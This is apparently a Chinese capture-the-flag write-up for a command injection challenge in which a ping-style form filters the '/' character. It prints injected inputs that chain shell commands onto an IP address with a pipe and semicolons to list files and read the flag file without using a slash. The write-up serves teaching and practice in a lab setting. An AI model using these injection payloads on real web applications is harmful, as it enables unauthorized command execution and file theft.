题目描述

这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗。

Solution

打开网页,可以看到网页源代码:

1.png

先看看当前目录有什么文件:

  1. 0.0.0.0 | ls -l

2.png

我们看看flag_is_here目录下有什么东西:

  1. 0.0.0.0 | ls flag_is_here

3.png

从源代码可知,后端用正则匹配过滤了/符号。我们可以用分号多命令执行的方式绕过:

  1. 0.0.0.0; cd flag_is_here; cat flag_16225566211066.php

4.png